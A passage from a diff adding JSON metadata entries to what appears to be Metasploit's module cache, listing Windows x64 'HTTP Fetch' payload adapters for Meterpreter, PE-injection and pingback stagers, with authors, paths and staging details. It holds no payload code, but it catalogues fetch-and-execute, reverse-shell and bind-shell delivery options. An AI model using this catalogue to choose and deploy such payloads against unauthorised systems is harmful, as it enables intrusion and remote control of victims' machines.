"windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_http": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_https": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_named_pipe": { + "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": 
"windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_rc4": { + "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the 
attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_winhttp": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_winhttps": { + "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": 
"Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/http/x64/meterpreter_bind_named_pipe": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_bind_tcp": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_http": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_https": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": 
"windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/peinject/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/peinject/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/peinject/bind_tcp_rc4": { + "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/peinject/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/peinject/reverse_named_pipe": { + "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/http/x64/peinject/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows 
x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/peinject/reverse_tcp_rc4": { + "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": 
"windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/peinject/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/pingback_reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/http/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 
